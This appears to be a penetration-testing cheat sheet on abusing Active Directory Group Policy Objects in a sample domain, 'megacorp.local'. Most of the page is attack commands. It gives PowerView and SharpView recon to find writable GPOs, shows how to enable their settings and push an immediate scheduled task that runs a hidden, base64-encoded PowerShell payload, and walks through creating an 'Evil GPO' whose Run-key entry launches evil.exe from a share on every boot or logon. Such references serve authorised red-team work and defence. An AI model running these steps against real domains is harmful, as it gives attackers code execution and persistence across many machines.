GPO Abuse
Group Policy Objects
Force GPO update on all domain computers:
PS > Get-ADComputer -Filter * | % {Invoke-GPUpdate -Computer $_.name -Force -RandomDelayInMinutes 0}

Hunt for GPOs

List all GPOs in the domain:
PS > .\SharpView.exe Get-DomainGPO -Properties displayName
List GPOs applied to a specifiec domain user or computer:
PS > .\SharpView.exe Get-DomainGPO -UserIdentity snovvcrash -Properties DisplayName
PS > .\SharpView.exe Get-DomainGPO -ComputerIdentity WS01 -Properties DisplayName
Or
Cmd > gpresult /r /user snovvcrash [/h gpos-snovvcrash.html]
Cmd > gpresult /r /s WS01 [/h gpos-ws01.html]
Search for writable GPOs for the Domain Users security group:
PV3 > Get-DomainGPO | Get-ObjectAcl | ? {$_.SecurityIdentifier -eq ((Get-DomainGroup "Domain Users" | select objectSid).objectSid)}
PV3 > Get-DomainGPO '{<GPO_GUID>}'
Or
PS > Get-GPO -Guid <GPO_GUID>

Permissions Abuse

Recon

Show all GPOs in the domain:
PV3 > Get-NetGPO -Domain megacorp.local | select cn,displayname
Search for GPOs that are controlled by the MEGACORP\PolicyAdmins group:
PV3 > Get-NetGPO | % {Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ? {$_.IdentityReference -eq "MEGACORP\PolicyAdmins"}
List computers that are affected by vulnerable (modifiable) GPO:
PV3 > Get-NetOU -GUID "00ff00ff-00ff-00ff-00ff-00ff00ff00ff" | % {Get-NetComputer -ADsPath $_}
Note: if I list all OUs affected by this GPO with PowerView, there will be no domain shown (like in BloodHound), but in Group Policy Manager we can see that it is presented.
Check if computer settings are enabled for this GPO (and enable them if not):
PS > Get-Gpo VULN.GPO.NAME
PS > Set-GpoStatus VULN.GPO.NAME -Status AllSettingsEnabled
List users that can create a GPO and link it to a specific OU:
PV3 > Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=megacorp,DC=local" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -match "CreateChild" } | select objectDN,securityIdentifier | fl
PV3 > Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select objectDN,securityIdentifier | fl

GPOImmediateTask

Create a task with a PowerShell payload:
$ echo 'sc -path "c:\\windows\\temp\\poc.txt" -value "GPO Abuse PoC..."' | iconv -t UTF-16LE | base64 -w0; echo
cwBjACAALQBwAGEAdABoACAAIgBjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABlAG0AcABcAHAAbwBjAC4AdAB4AHQAIgAgAC0AdgBhAGwAdQBlACAAIgBHAFAATwAgAEEAYgB1AHMAZQAgAFAAbwBDAC4ALgAuACIACgA=
PS > New-GPOImmediateTask -TaskName Pentest -GPODisplayName VULN.GPO.NAME -CommandArguments '-NoP -NonI -W Hidden -Enc cwBjACAALQBwAGEAdABoACAAIgBjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABlAG0AcABcAHAAbwBjAC4AdAB4AHQAIgAgAC0AdgBhAGwAdQBlACAAIgBHAFAATwAgAEEAYgB1AHMAZQAgAFAAbwBDAC4ALgAuACIACgA=' -Force
Cleanup:
PS > New-GPOImmediateTask -GPODisplayName VULN.GPO.NAME -Remove -Force
Check when GP was last applied:
Cmd > GPRESULT /R

GPPrefRegistryValue

Check if GPMC is installed and if it's not, install it as a Windows Feature (requires elevation):
PS > Get-Module -List -Name GroupPolicy | select -expand ExportedCommands
PS > Install-WindowsFeature –Name GPMC
Create an evil GPO and link it to the target OU (will be visible in the management console):
PS > New-GPO -Name "Evil GPO" | New-GPLink -Target "OU=Workstations,DC=megacorp,DC=local"
Locate a writable network share:
PV3 > Find-DomainShare -CheckShareAccess
Prepare your payload, put it to the network share and create an autorun value in the evil GPO to run the payload on boot/logon:
PS > Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "%COMSPEC% /b /c start /b /min /c \\srv01\SoftwareShare\evil.exe" -Type ExpandString

WMI Filters

Tools

SharpGPOAbuse

pyGPOAbuse

Last modified 1mo ago